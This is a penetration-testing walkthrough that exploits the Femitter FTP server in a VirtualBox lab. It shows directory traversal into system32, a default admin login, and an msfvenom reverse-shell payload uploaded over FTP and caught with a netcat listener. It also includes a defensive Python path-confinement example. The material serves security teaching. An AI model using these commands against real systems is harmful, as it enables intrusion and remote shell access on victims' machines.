
Every ethical hacker knows the recurring feeling of brief confusion on discovering that an unfamiliar vulnerable service is running, followed by lasting relief upon finding a working exploit.

Femitter FTP server turned out to be one of those moments for me. I had never heard of it, and yet it would soon be under my control to manipulate the victim machine, a byproduct of the software’s faulty programming.

This is how to exploit Femitter FTP: a Kali Linux walkthrough.

Here’s What You Need

  • Windows Client (VirtualBox)
  • Kali Linux (VirtualBox)
  • Femitter FTP/HTTP Server from the site.

After downloading and running the Femitter installer on the Windows client, we open the new program and start the HTTP/FTP servers.

Why It’s Vulnerable

Femitter allows anonymous users to authenticate by default. It is also vulnerable to directory traversal: a remote path containing ../ sequences is resolved outside the FTP root.

# list the files on the Windows client (Program Files)
ftp> ls ../../../../Progra~1
200 Port command successful.
150 Opening data connection for directory list.
dr--r--r--   1 ftp      ftp            0 Jun 29 19:34 Program Files
226 File sent ok

Now watch closely as I am able to put a test file in the Windows client’s /windows/system32 directory.

# upload file to victim's protected directory
ftp> put test.txt ../../../../windows/system32/test.txt
local: test.txt remote: ../../../../windows/system32/test.txt
200 Port command successful.
150 Opening data connection for ../../../../windows/system32/test.txt.
226 File received ok
5 bytes sent in 0.00 secs (82.7595 kB/s)
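
The two transcripts above succeed because the server uses the client-supplied path without confining it to the FTP root. The following is an added example, not code from the original post or from Femitter, showing an unchecked join beside a confined one; the root `C:\ftproot` and all function names are assumptions.

```python
import ntpath

FTP_ROOT = r"C:\ftproot"  # assumed FTP root directory; not taken from the page


def naive_resolve(root, client_path):
    """Join and normalize with no containment check (traversal-prone)."""
    return ntpath.normpath(ntpath.join(root, client_path.replace("/", "\\")))


def confined_resolve(root, client_path):
    """Return the absolute path for client_path, or raise if it leaves root."""
    rel = client_path.replace("/", "\\")   # FTP clients send forward slashes
    _, rel = ntpath.splitdrive(rel)        # discard any drive or UNC prefix
    rel = rel.lstrip("\\")                 # "/x" means root-relative, not C:\x
    candidate = ntpath.normpath(ntpath.join(root, rel))
    base = ntpath.normcase(ntpath.normpath(root))
    probe = ntpath.normcase(candidate)     # Windows paths are case-insensitive
    # Compare against base plus a separator so C:\ftproot-backup does not pass.
    if probe != base and not probe.startswith(base + "\\"):
        raise PermissionError(f"path escapes FTP root: {client_path!r}")
    # This check is lexical only. A real server should also canonicalize on
    # disk (os.path.realpath) so junctions and 8.3 short names such as
    # Progra~1 cannot alias a location outside the root.
    return candidate


def is_allowed(root, client_path):
    """True when client_path stays inside root."""
    try:
        confined_resolve(root, client_path)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    # The two remote paths from the transcripts above, plus one benign path.
    for p in ("../../../../Progra~1",
              "../../../../windows/system32/test.txt",
              "uploads/test.txt"):
        print(f"{p!r}: naive -> {naive_resolve(FTP_ROOT, p)}, "
              f"allowed = {is_allowed(FTP_ROOT, p)}")
```

Running the server under a low-privilege account and disabling anonymous login limit the damage further if a path check is ever bypassed.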

Set Up Femitter FTP Server

By default, the Femitter servers must be started manually; starting them automatically is a configuration option. I choose to start the server manually to be sure it is on, but you can do either, as long as the software is running so we can attack and destroy.

Femitter FTP Exploit

Run an Nmap Scan

By running an Nmap (network mapper, yea I know) Scripting Engine script, a .nse file (use locate *.nse to find the scripts on your system), I see the accounts on the remote FTP server whose credentials were brute-forced.

Apparently Femitter is not very secure at all!

Let’s connect using one of the many authorized user accounts.

# connect and get ready to destroy
ftp 10.0.2.10
Connected to 10.0.2.10.
220 Femitter FTP Server ready.
Name (10.0.2.10:root): admin
331 Password required for admin.
Password: admin
230 User admin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

How to Exploit Femitter

Exploiting the vulnerable software can be done manually by creating an msfvenom reverse shell (meterpreter or windows/shell_reverse_tcp; don’t use meterpreter if you can help it). I prefer to use the exploit found in a Python script.

Figure: Femitter FTP exploit. Uploading the test file.

The exploit creates an msfvenom payload and names it zzzzz.exe. It then uploads the executable, via the directory traversal vulnerability, into one of the most protected directories on the Windows victim.

Figure: Femitter FTP exploit. See how the payload has been uploaded?

How to Exploit Manually

First you have to make the payload.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f exe -o payload_femitter.exe

Then upload the payload after connecting to the FTP server on the Windows client.

ftp 192.168.56.103
cd ..
put payload_femitter.exe

Now to call the payload and receive a shell using netcat.

nc -lvp 1234

And that’s it, the payload was uploaded and a shell was received by using a netcat listener. From this point any number of things can be done to escalate privileges. Don’t know what to do next? See the Best Pentesting Cheatsheet for Ethical Hackers.
